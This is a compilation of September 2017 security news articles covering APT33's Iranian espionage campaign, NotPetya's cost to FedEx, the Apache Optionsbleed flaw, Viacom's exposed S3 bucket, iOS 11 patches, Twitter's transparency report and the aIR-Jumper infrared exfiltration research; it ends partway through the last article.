APT33: Researchers Expose Iranian Hacking Group Linked to Destructive Malware
21.9.2017 thehackernews APT

Security researchers have recently uncovered a cyber espionage group targeting aerospace, defence and energy organisations in the United States, Saudi Arabia and South Korea.
According to the latest research published Wednesday by US security firm FireEye, an Iranian hacking group that it calls Advanced Persistent Threat 33 (or APT33) has been targeting critical infrastructure, energy and military sectors since at least 2013 as part of a massive cyber-espionage operation to gather intelligence and steal trade secrets.
The security firm also says it has evidence that APT33 works on behalf of Iran's government.
FireEye researchers have spotted cyber attacks aimed by APT33 since at least May 2016 and found that the group has successfully targeted aviation sector—both military and commercial—as well as organisations in the energy sector with a link to petrochemical.
The APT33 victims include a U.S. firm in the aerospace sector, a Saudi Arabian business conglomerate with aviation holdings, and a South Korean company involved in oil refining and petrochemicals.
Most recently, in May 2017, APT33 targeted employees of a Saudi organisation and a South Korean business conglomerate using a malicious file that attempted to entice them with job vacancies for a Saudi Arabian petrochemical company.
"We believe the targeting of the Saudi organisation may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies," the FireEye report reads.
APT33 targets organisations by sending spear phishing emails with malicious HTML links to infect targets' computers with malware. The malware used by the espionage group includes DROPSHOT (dropper), SHAPESHIFT (wiper) and TURNEDUP (custom backdoor, which is the final payload).
However, in previous research published by Kaspersky, DROPSHOT was tracked by its researchers as StoneDrill, which targeted petroleum company in Europe and believed to be an updated version of Shamoon 2 malware.
"Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT," the report reads.
The SHAPESHIFT malware can wipe disks, erase volumes and delete files, depending on its configuration.
According to FireEye, APT 33 sent hundreds of spear phishing emails last year from several domains, which masqueraded as Saudi aviation companies and international organisations, including Boeing, Alsalam Aircraft Company and Northrop Grumman Aviation Arabia.
The security firm also believes APT 33 is linked to Nasr Institute, an Iranian government organisation that conducts cyber warfare operations.
In July, researchers at Trend Micro and Israeli firm ClearSky uncovered another Iranian espionage group, dubbed Rocket Kittens, that was also active since 2013 and targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.
However, FireEye report does not show any links between both the hacking group. For more technical details about the APT33 operations, you can head on to FireEye's official blog post.


FedEx Profit Takes $300 Million Hit After Malware Attack
21.9.2017 securityweek  Virus
The malware attack that hit international delivery services company TNT Express in June had a negative impact of roughly $300 million on FedEx’s profit in the latest quarter.

TNT Express, which FedEx acquired last year for $4.8 billion, was one of several major companies whose systems were infected with NotPetya malware (also known as Nyetya, PetrWrap, exPetr, GoldenEye, and Diskcoder.C) in late June.

The company reported a few weeks after the attack that the incident had a significant impact on its operations and communications. FedEx admitted at the time that it was possible TNT would not be able to fully restore all affected systems and recover all the critical business data encrypted by NotPetya.

“The worldwide operations of TNT Express were significantly affected during the first quarter by the June 27 NotPetya cyberattack. Most TNT Express services resumed during the quarter and substantially all TNT Express critical operational systems have been restored. However, TNT Express volume, revenue and profit still remain below previous levels,” the company said on Tuesday.

“Operating results declined due to an estimated $300 million impact from the cyberattack, which was partially offset by the benefits from revenue growth, lower incentive compensation accruals and ongoing cost management initiatives,” it added.

Hurricane Harvey, a category 4 hurricane that hit Texas in late August, also had a negative impact on the company’s earnings in the latest quarter.

FedEx reported earnings of $2.19 per diluted share compared to $2.65 per diluted share one year ago. The company reported a revenue of $15.3 billion and reaffirmed its commitment to improve the operating income of its largest business, FedEx Express, by $1.2 billion to $1.5 billion by 2020 compared to fiscal 2017.

FedEx is not the only company whose bottom line was impacted by NotPetya, a piece of malware that initially appeared to be ransomware and later turned out to be a wiper.

Financial reports published in August by Danish shipping giant AP Moller-Maersk, British consumer goods company Reckitt Benckiser, voice and language solutions provider Nuance Communications, Mondelez International, and French construction giant Saint-Gobain reported losses of millions of dollars due to the cyberattack. The highest sum was announced at the time by Saint Gobain, which expected losses to rise to nearly $400 million.


Iranian cyber spies APT33 target aerospace and energy organizations
21.9.2017 securityaffairs  APT

The Iran-linked APT33 group has been targeting aerospace and energy organizations in the United States, Saudi Arabia, and South Korea.
According to security firm FireEye, a cyber espionage group linked to the Iranian Government, dubbed APT33, has been targeting aerospace and energy organizations in the United States, Saudi Arabia, and South Korea.

The APT33 group has been around since at least 2013, since mid-2016, the group targeted the aviation industry and energy companies with connections to petrochemical production.

“From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.” reads a blog post published by FireEye.

“During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.”

According to the experts, the APT33 group is gathering information on Saudi Arabia’s military aviation capabilities to gain insight into rivals in the MiddleEast.

“We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia,” continues FireEye.

“We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies,”

The cyberspies leverage spear phishing emails sent to employees whose jobs related to the aviation industry.

APT33 phishing

The recruitment themed messages contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be of interest for the victims.

The experts noticed APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send phishing messages to targeted individuals in 2016.

The attackers set up several domains that appeared as belonging to Saudi aviation firms and other companies that work with them, including Alsalam Aircraft Company, Boeing and Northrop Grumman Aviation Arabia.

The malware used by the APT33 group includes a dropper dubbed DROPSHOT that has been linked to the wiper malware SHAPESHIFT, tracked by Kaspersky as StoneDrill, used in targeted attacks against organizations in Saudi Arabia. The arsenal of the group also includes a backdoor called TURNEDUP.

Kaspersky experts linked the StoneDrill malware to the Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef), a threat actor believed to be operating out of Iran.

The researchers identified an actor using the handle “xman_1365_x” that has been involved in the development and use of the TURNEDUP backdoor.

“Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.” continues FireEye.

FireEye cited open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is the equivalent to Iran’s “cyber army” and directly controlled by the Iranian government.


Optionsbleed vulnerability can cause Apache servers to leak memory data
21.9.2017 securityaffairs  Hacking

The vulnerability Optionsbleed in Apache HTTP Server that can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests.
The freelance journalist and security researcher Hanno Böck discovered a vulnerability, dubbed ‘Optionsbleed’. in Apache HTTP Server (httpd) that can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests.

Böck was analyzing HTTP methods when he noticed that requests with the OPTIONS method, which is normally used by a client to ask a server which HTTP methods it supports, were returning apparently corrupted data via the “Allow” header instead of the list of supported HTTP methods (e.g. “Allow: GET, POST, OPTIONS, HEAD”). However, some of the responses to the researcher’s requests looked like this:

Below an example of the response obtained by Böck:

Allow: POST,OPTIONS,,HEAD,:09:44 GMT
Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE
Apache leaked server memory due to a use-after-free bug tracked as CVE-2017-9798.

optionsbleed

Respect other flaws “bleeding” memory contents like Heartbleed, the Optionsbleed vulnerability is less severe because in order to be exploited the targeted system needs to be configured in a certain way, and anyway the response doesn’t always contain other data.

Security firm Sophos published a detailed analysis of the vulnerability.

The expert tested the Optionsbleed flaw in the Alexa Top 1 Million websites and received corrupted Allow headers from only 466 of them.

With the support of the Apache developer Jacob Champion, Böck verified that the Optionsbleed vulnerability only affects specific configurations. Böck has released a proof-of-concept (PoC) script for Optionsbleed.

“Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that’s not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer. (However ASAN doesn’t work reliably due to the memory allocation abstraction done by APR.)” explained the researcher.

The researcher highlighted potential risks for shared hosting environments.

“The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system,” Böck added.

The problem is not new, it was analyzed in a paper titled “Support for Various HTTP Methods on the Web” published back in May 2014, just a few weeks after the disclosure of the Heartbleed vulnerability.

The bad news for the Apache users is that the maintainers of the project could not provide an estimated date for the fix, for this reason, he decided to share its findings.

Development teams behind Linux distributions have also started releasing fixes for the Optionsbleed flaw.


FedEx announces $300m in lost business and response costs after NotPetya attack
21.9.2017 securityaffairs  Ransomware

FedEx is the last firm in order of time that disclosed the cost caused by the massive NotPetya, roughly $300m in lost business and response costs.
The malware compromised systems worldwide, most of them in Ukraine, the list of victims is long and includes the US pharmaceutical company Merck, the shipping giant Maersk, the Ukraine’s central bank, Russian oil giant Rosneft, advertising group WPP, TNT Express and the law firm DLA Piper.

According to the second quarter earnings report published by Maersk, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

The situation announced by FedEx is also disconcerting, its systems will only be fully restored only at the end of September, three months after the incident.

“The worldwide operations of TNT Express were significantly affected during the first quarter by the June 27 NotPetya cyberattack. Most TNT Express services resumed during the quarter and substantially all TNT Express critical operational systems have been restored. However, TNT Express volume, revenue and profit still remain below previous levels,” the company said on Tuesday.

“Operating results declined due to an estimated $300 million impact from the cyberattack, which was partially offset by the benefits from revenue growth, lower incentive compensation accruals and ongoing cost management initiatives,”

NotPetya

During a conference call with financial analysts on Tuesday, FedEx chief information officer Rob Carter confirmed that the attack vector was an infected tax software update delivered to its system in Ukraine, clearly, it is referring the MeDoc accounting application.

Carter confirmed that the malware used in the attack was extremely disruptive, but also confirmed that customer data were not exposed.

“This attack was the result of [a] nation state targeting Ukraine and companies that do business there,” he explained.

TNT adopting further measured to protect its infrastructure, especially legacy systems in hubs and depots worldwide.

Other companies are counting the huge cost of attack, the consumer goods firm Reckitt Benckiser announced the attack cost it £100m ($136m), but the highest cost was announced by Saint Gobain, which expected $400 million losses.


Iranian Hackers Target Aerospace, Energy Companies
20.9.2017 securityweek BigBrothers
A cyber espionage group linked by security researchers to the Iranian government has been observed targeting aerospace and energy organizations in the United States, Saudi Arabia and South Korea.

The threat actor, tracked by FireEye as APT33, is believed to have been around since at least 2013. Since mid-2016, the security firm has spotted attacks aimed by this group at the aviation sector, including military and commercial aviation, and energy companies with connections to petrochemical production.

Specifically, the cyberspies targeted a U.S. organization in the aerospace sector, a Saudi Arabian business conglomerate with aviation holdings, and a South Korean firm involved in oil refining and petrochemicals. In recent attacks, the hackers used job vacancies at a Saudi Arabian petrochemical firm to target the employees of organizations in South Korea and Saudi Arabia.Iranian hackers launch attacks on energy and aviation companies

“We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia,” FireEye said in a blog post.

“We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies,” the company added.

According to FireEye, the cyber espionage group sent hundreds of spear phishing emails last year. They set up several domains made to look as if they belonged to Saudi aviation firms and international organizations that work with them, including Alsalam Aircraft Company, Boeing and Northrop Grumman Aviation Arabia.

The malware used by the group includes a dropper tracked by FireEye as DROPSHOT, a wiper named SHAPESHIFT, and a backdoor called TURNEDUP. DROPSHOT was previously analyzed by Kaspersky, which tracks it as StoneDrill.

The StoneDrill malware was tied by Kaspersky to the notorious Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef), a threat actor believed to be operating out of Iran.

FireEye has also linked APT33 to Iran based on connections to the “Nasr Institute,” which is said to be Iran’s “cyber army”, attacks launched during Iranian working hours, and the use of Iranian hacking tools.

Iran appears to have several cyber espionage groups, including Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten and CopyKittens.


Intrusion Detection Startup Threat Stack Raises $45 Million
20.9.2017 securityweek IT
Threat Stack, a Boston, Mass.-based intrusion detection startup has raised $45 million in a Series C funding, bringing the total raised by the company to more than $70 million.

The cybersecurity startup offers an integrated suite of detection and assessment tools that help customers with security and compliance by combing continuous security monitoring and risk assessment across wide range of detection points across customers’ infrastructure.

Threat Stack explains that its platform offers a single place to monitor cloud, hybrid cloud, multi-cloud, and containerized environments, and can automatically correlate events together to identify suspicious activity.

The company claims 235% year-over-year revenue growth and an 84% increase in employee headcount as of July, with plans to grow its employee base another 30% by the end of this year, and doubling the size of its downtown Boston headquarters.

Threat Stack Logo“Every company is looking to get their arms around the security of their infrastructure. Most are dealing with a shortage of security talent and increasingly automated development processes - so there is a unique need for deploying security at speed and scale,” Brian M. Ahern, Threat Stack Chairman and CEO, said in a statement. “Threat Stack has built a platform for both security and operations teams to do just that. The market opportunity ahead is enormous.”

The funding round was led by F-Prime Capital Partners, the venture capital group of Fidelity Investments, and Eight Roads Ventures. Existing investors Scale Venture Partners, .406 Ventures, and Accomplice also participated in the round.

As part of the funding, Gaurav Tuli of F-Prime will join Threat Stack’s Board of Directors and Davor Hebel of Eight Roads Ventures will be an observer.

“The migration of computing workloads to public cloud environments represents the most significant shift in enterprise technology of the last 15 years. Cybersecurity continues to be the most acute challenge in the move to cloud, as cloud infrastructure is elastic and complex and attackers are operating at unprecedented speed and sophistication,” said Tuli. “Cloud security requires new approaches and new solutions, and Threat Stack is a rare security company that is purpose-built to address these unique challenges. Our investment will help drive continued innovation to meet the rapidly expanding market demand.”


Infrared Cameras Allow Hackers to Jump Air Gaps
20.9.2017 securityweek Hacking
A team of researchers from Israel has developed a piece of malware that demonstrates how hackers can abuse security cameras with infrared (IR) capabilities to send and receive data to and from an air-gapped network.

The research was conducted by the Ben-Gurion University of Negev and the Shamoon College of Engineering in Israel. Its goal was to show that a piece of malware installed in an air-gapped network can not only exfiltrate sensitive data, such as passwords, PINs and encryption keys, but also receive commands from the outside world via infrared light, which is invisible to the human eye.

Security cameras are typically equipped with IR LEDs that provide night vision capabilities. If an attacker can plant a piece of malware on the network connected to these cameras, the malware can take control of the IR LEDs and use them to transmit bits of data.

The malware described by experts, dubbed “aIR-Jumper,” can encode the stolen data using various methods. For example, if on-off keying (OOK) encoding is used, the absence of an IR signal for a certain duration encodes a zero (“0”) bit, while the presence of a signal for the same duration encodes a one (“1”) bit.

Encoding one character of a password, PIN or encryption key requires 8 bits (1 byte). However, for data transmission purposes, the researchers suggested also adding preamble bits for calibrating certain parameters (e.g. LED location and IR levels) and synchronization with the beginning of the transmission, and some bits for error detection.

Another encoding method suggested by the researchers involves frequency changes. For example, a “1” is encoded if the LED is on for a certain duration at a certain frequency, and a zero is encoded if it’s on at a different frequency. Similarly, intensity level changes, or amplitude shift keying (ASK), can be used.

Data transmission rates depend on the security camera and the camera used to capture the data (e.g. GoPro, smartphone camera). Experiments conducted by the researchers showed that data can be exfiltrated at a rate of 20 bits/sec over a distance of tens of meters, and it can be infiltrated over a distance of hundreds of meters and even kilometers at a rate of 100 bits/sec.

Data transmission rates can be increased significantly if more than one security camera is used by the attacker. Videos have been published to show how the infiltration and exfiltration attacks work.


AWS Bucket Leaks Viacom Critical Data
20.9.2017 securityweek Cyber
An Amazon Web Services S3 cloud storage bucket containing a great deal of Viacom internal access credentials and other critical data was left publicly accessible, UpGuard security researchers have discovered.

Viacom is an $18 billion multinational corporation that owns Paramount Pictures and various cable channels, including MTV, BET, Comedy Central, and Nickelodeon. According to the company, it has “the largest portfolio of ad-supported cable networks in the United States, in terms of audience share.”

Chris Vickery, UpGuard Director of Cyber Risk Research, was the one to discover the exposed Amazon Web Services (AWS) bucket. In it, he found seventy-two .tgz files representing irregular backups of technical data, created starting with June 2017 and containing a host of sensitive data.

The backups, which the security researcher determined to be incremental, were located at the subdomain “mcs-puppet.” MCS likely refers to Multiplatform Compute Services, the group that supports the infrastructure for hundreds of Viacom’s online properties, including MTV, Nickelodeon, Comedy Central, Paramount, and BET.

MCS appears to be currently in the process of migrating its infrastructure to AWS and getting ready to launch production workloads on containers (Amazon ECS), which explains the presence of said backup data on AWS.

After having a look at the exposed data, the security researcher determined that it included a master provisioning server running Puppet, left accessible to the public Internet, along with “the credentials needed to build and maintain Viacom servers across the media empire’s many subsidiaries and dozens of brands,” UpGuard’s Dan O'Sullivan notes in a blog post.

Viacom’s secret cloud keys were also exposed in the leak, which could have put the media company’s cloud-based servers in the hands of hackers. Thus, attackers could have been able to launch a variety of attacks while leveraging “the IT infrastructure of one of the world’s largest broadcast and media companies.”

UpGuard also explains that in addition to the passwords and manifests for Viacom’s servers, the access key and secret key for the corporation’s AWS account were also stored in the repository. Thus, an attacker accessing the bucket could have compromised Viacom’s servers, storage, and databases under the AWS account, leveraging the leaked data for phishing schemes or abusing Viacom’s IT systems for a botnet.

“Analysis reveals that a number of cloud instances used within Viacom’s IT toolchain, including Docker, New Relic, Splunk, and Jenkins, could’ve thus been compromised in this manner,” O'Sullivan says.

When decompressed, each of the seventy-two .tgz files in the bucket revealed a number of folders, such as “manifests,” “configs,” “keys,” and “modules,” along with various files that indicated the use of server provisioning and automation suite Puppet, which is frequently used by IT admins for configuration management.

The suite allows enterprises to easily create new servers and streamline operations at scale, and an admin using it would need to know all of the relevant credentials to have access to all required systems, and this type of access was leaked via said repository.

“Picture a skeleton key, opening not merely every door in a house, but every door that could be added to the house as well. This is the type of master access that was publicly exposed in the S3 bucket,” O'Sullivan explains.

Other data in the bucket included GPG decryption keys, as Viacom utilizes GPG encryption on many regular backups, thus allowing an attacker to decrypt data. Ruby scripts were also exposed in the leak, allowing malicious actors to know what applications are being run.

UpGuard discovered the exposed bucket on August 30 and alerted Viacom the next day. The multinational corporation closed the gap within hours.

“This incident highlights the potentially enormous cost such data leaks can evince upon even the largest and most sophisticated organizations. Exposed in this incident were nothing less than the master controls needed to harness the power of a digital media empire and turn it towards nefarious aims,” O'Sullivan points out.

We’ve contacted Viacom for a comment on this and will update the article as soon as a response arrives.


Viacom left the keys of its digital kingdom on a publicly exposed AWS S3 bucket
20.9.2017 securityaffairs Cyber

The security researcher Chris Vickery discovered that Media giant Viacom left sensitive data and secret access key on unsecured Amazon AWS S3 bucket.
Media giant Viacom left sensitive data and secret access key on unsecured Amazon AWS S3 bucket, a gift for hackers. Viacom controls Paramount Pictures, MTV, Comedy Central and Nickelodeon.

The huge trove of data store was discovered by the popular security researcher Chris Vickery, director of Cyber Risk Research at security shop UpGuard.

The Amazon AWS S3 bucket contained 72 compressed .tgz files in a folder labeled ‘MCS’ name which appears to be Viacom’s Multiplatform Compute Services division that operates IT systems for the firm.

The cloud storage exposed a gigabyte’s worth of credentials and configuration files for the backend of dozens of Viacom properties.

“While Viacom has not confirmed to UpGuard the purpose of this bucket, the contents of the repository appear to be nothing less than either the primary or backup configuration of Viacom’s IT infrastructure. The presence of this data in an S3 bucket bearing MCS’s name appears to further corroborate the Viacom group’s mission of moving its infrastructure onto Amazon Web Services’ cloud.” states Vichery.

The Amazon AWS S3 contained the passwords and manifests for Viacom’s servers, as well as the access key and private key for the corporation’s AWS account. Some of the data was encrypted using GPG, but the disconcerting news is that the bucket also contained the related decryption keys.

“While the exposure has since been closed, following UpGuard’s notification to Viacom, this incident highlights the potentially enormous cost such data leaks can evince upon even the largest and most sophisticated organizations. Exposed in this incident were nothing less than the master controls needed to harness the power of a digital media empire and turn it towards nefarious aims.” added Vickery.

“The leaked Viacom data is remarkably potent and of great significance, an important reminder that cloud leaks need not be large in disk size to be devastating; when it comes to data exposures, quality can be as vital as quantity,”


Vickery was disconcerting by its discovery and highlighted the risks faced by the organization.

“Perhaps most damaging among the exposed data are Viacom’s secret cloud keys, an exposure that, in the most damaging circumstances, could put the international media conglomerate’s cloud-based servers in the hands of hackers,” says Vickery.

“Analysis of the Viacom leak reveals nothing less than this: the keys to a media kingdom were left publicly accessible on the internet, completely compromising the integrity of Viacom’s digital infrastructure.”

Viacom sent the following statement to Vickery

“Once Viacom became aware that information on a server – including technical information, but no employee or customer information – was publicly accessible, we rectified the issue. We have analyzed the data in question and determined there was no material impact.”

The Viacom case is just the latest in order of time of Amazon S3 buckets found unsecured online.

Earlier September, researchers from cybersecurity company UpGuard have discovered thousands of files containing personal data on former US military, intelligence, and government workers have allegedly been exposed online for months.

On August, Vickery discovered more than 1.8 million voter records belonging to Americans have been accidentally leaked online by a US voting machine supplier for dozens of US states.

In June, Vickery discovered that a top defense contractor left tens of thousands sensitive Pentagon documents on Amazon Server Without any protection in places.

Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In July, he discovered data belonging to 14 million U.S.-based Verizon customers that have been exposed on an unprotected AWS Server by a partner of the telecommunications company. In December 2015, the security expert discovered U.S.-based Verizon customers that have been exposed on an unprotected AWS Server by a partner of the telecommunications company. In December 2015 the security expert discovered 191 million records belonging to US voters online, on April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a 1.37 billion records data leak, in June 2017 Vickery revealed the DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.


iOS 11 Patches 8 Security Vulnerabilities
20.9.2017 securityweek iOS

Apple this week announced the availability of 8 security patches for its iPhone 5s and later, iPad Air and later, and iPod touch 6th generation users, released as part of the iOS 11 platform upgrade.

The bugs affect 7 platform components, namely Exchange ActiveSync, iBooks, Mail MessageUI, Messages, MobileBackup, Safari, and WebKit. Exploitation of these issues could lead to data deletion, denial of service, address bar spoofing, or the creation of unencrypted backups.

Through requiring TLS, Apple resolved a validation issue (CVE-2017-7088) in Exchange ActiveSync that could allow an attacker in a privileged network position to erase a device during Exchange account setup.

The company also patched denial of service issues in iBooks (CVE-2017-7072), Mail MessageUI (CVE-2017-7097), and Messages (CVE-2017-7118), which could be exploited by an attacker through supplying a maliciously crafted iBooks file or a maliciously crafted image. Improved memory handling and improved validation resolved the bugs, Apple says.

A permissions issue (CVE-2017-7133) in MobileBackup that could result in the creation of an unencrypted backup despite a requirement to perform only encrypted backups was resolved with improved permission validation.

A vulnerability (CVE-2017-7085) in Safari that Apple refers to as an “inconsistent user interface issue” could result in address bar spoofing when visiting a malicious website and was addressed with improved state management.

The tech giant also patched two flaws in WebKit. Tracked as CVE-2017-7106, the first of them could result in address bar spoofing when visiting a malicious website. The second is tracked as CVE-2017-7089 and could lead to universal cross site scripting when processing maliciously crafted web content. Apple addressed both with improved state management.

The three vulnerabilities in Safari and WebKit were found to affect OS X and macOS users as well, and Apple released Safari 11 to address them. The update applies to OS X El Capitan 10.11.6 and macOS Sierra 10.12.6 systems, the company says.

Additionally, the company pushed Xcode 9 to plug seven security flaws in Git, ld64, and subversion, all of which could lead to arbitrary code execution. While Git and subversion were affected by a single issue each, ld64 had five security vulnerabilities. Xcode 9 is available for macOS Sierra 10.12.6 or later users.

Apple also released iTunes 12.7 and iTunes 12.7 for Windows, along with tvOS 11 and watchOS 4 to address bugs in them, but hasn’t provided details on the content of these patches as of now.


'Optionsbleed' Flaw Causes Apache to Leak Data
20.9.2017 securityweek Hacking
A vulnerability found in Apache HTTP Server (httpd) can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests, a researcher warned.

The flaw was discovered by freelance journalist and security researcher Hanno Böck, who has dubbed it “Optionsbleed.” Despite having a fancy name that is similar to the critical OpenSSL vulnerability known as Heartbleed due to them both “bleeding” memory contents, Optionsbleed is not as severe or as widespread.

Böck was analyzing HTTP methods in an effort to determine if they have any vulnerabilities when he noticed that requests with the OPTIONS method, which allows a client to ask a server which HTTP methods it supports, were returning what appeared to be corrupted data via the “Allow” header.

Typically, responses to OPTIONS requests should contain a list of supported HTTP methods in the Allow header (e.g. “Allow: GET, POST, OPTIONS, HEAD”). However, some of the responses to the researcher’s requests looked like this:

Allow: POST,OPTIONS,,HEAD,:09:44 GMT

Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"

Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE

Further analysis revealed that Apache leaked server memory due to a use-after-free bug. The flaw, which could result in the exposure of sensitive data, has been assigned the CVE identifier CVE-2017-9798.

What makes the Optionsbleed flaw less severe is the fact that the targeted system needs to be configured in a certain way for an attack to work, and the response doesn’t always contain other data. Requests sent by the expert to the Alexa Top 1 Million websites resulted in corrupted Allow headers from only 466 of them.

Apache is one of the most widely used web servers. Data from Netcraft shows that Apache was used by roughly 40 percent of the top million most visited websites in August.

With help from Apache developer Jacob Champion, Böck determined that the flaw only affects specific configurations.

“Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens,” the researcher explained. “Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer.”

While the security bug does not pose a risk for a majority of websites using Apache, it could represent a serious problem in shared hosting environments.

“The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system,” Böck warned.

The expert pointed out that the leaks were evident in a paper on support for HTTP methods that was published in May 2014, roughly one month after Heartbleed came to light, but no one noticed the problem at the time.

Böck said the Apache security team could not provide an estimated date for when a patch would become available, so he decided to make his findings public before a fix was included in a new Apache httpd release. Optionsbleed can still be patched by making source code changes. Several Linux distributions have also started releasing fixes.

Böck has released a proof-of-concept (PoC) script for Optionsbleed and Sophos has published a blog post with a detailed technical description of the flaw.


Twitter Suspends Nearly 1 Million Accounts Associated with Terrorism
20.9.2017 securityweek Social

Twitter has suspended a total of 935,897 accounts for the promotion of terrorism between August 1, 2015, and June 30, 2017, the company says in its latest transparency report.

A total of 299,649 accounts were suspended during the first half of 2017, marking a 20% decrease compared to the previous six-month period, the company reveals. 95% of the account suspensions were the result of internal efforts, the social platform claims.

These are “accounts that actively incite or promote violence associated with internationally recognized terrorist organizations, promote internationally recognized terrorist organizations, and accounts attempting to evade prior enforcement,” Twitter explains.

According to the social media network, 75% of the accounts suspended during the January-June 2017 timeframe were blocked before posting their first tweet. The sustained effort to eliminate such activity from the platform has resulted in an 80% drop in government reports on such accounts, compared to the previous six months.

However, government requests accounted for less than 1% of account suspensions, as they only amounted to 338 reports referring to 1,200 accounts. They also represented only 2% of the reports received from governments around the world, which summed up to 16,818 reports in the six-month period.

The largest number of such reports were received for abusive behavior, at 16,414, which represented 98% of global government TOS (Terms of Service) reports. These referred to 6,299 accounts, only 12% of which were actioned on, but the majority of requests didn’t result in content removal.

Twitter also received 37 requests related to copyright, and 29 reports related to trademark. These are non-legal requests submitted by government representatives about content that might violate the company’s rules against copyright and trademark infringement.

In its transparency report, the social platform says it received a total of 6,448 global government requests for account information from January through June, 2017, up 6% from the previous period, but affecting 3% fewer accounts. Some of the requests originated from four new countries, namely Nepal, Paraguay, Panama, and Uruguay.

Twitter also reveals that it received around 10% more global legal requests to remove content, and that these impacted roughly 12% more accounts compared to the previous reporting period. Such requests came from various countries, including nine new ones: Bahrain, China, Croatia, Finland, Nepal, Paraguay, Poland, Qatar, Ukraine, and Uruguay.

In the United States, the company received a total of 2,111 account information requests that specified 4,594 accounts, and also received 118 removal requests. The U.S. continues to account for the majority of global government requests for account information.

“United States submitted 33% of all worldwide requests for user account information. Interestingly, the total number of requests from U.S. law enforcement and government entities decreased by 8% and those requests affected 18% fewer accounts from last report to this report. This marks the third straight report where we’ve seen a decrease in U.S. requests,” Twitter says.

During the first half of 2017, Washington, D.C. was the top U.S. requester, submitting 14.3% of total requests, followed by California with 13.8% of the requests. In the timeframe, the San Francisco-based company received 245 non-California state-issued subpoenas and court orders, down from 295 during the previous reporting period.


aIR-Jumper – A malware exfiltrates data via security cameras and infrared
20.9.2017 securityaffairs Virus

Researchers at the Ben-Gurion University developed a PoC malware dubbed aIR-Jumper that uses security cameras with Infrared capabilities to exfiltrate data.
The team of researchers at the Ben-Gurion University of the Negev in Israel composed of Mordechai Guri, Dima Bykhovsky‏, Yuval Elovici developed a PoC malware that leverages security cameras with Infrared capabilities to steal data.

The security cameras are used as a covert channel for data exfiltration and to send commands to the malicious code.

Modern surveillance and security cameras are equipped with infrared LEDs for night vision, experts decided to exploit them because infrared light is imperceptible to the human eye making impossible for users to discover the data transmission through led blinking.

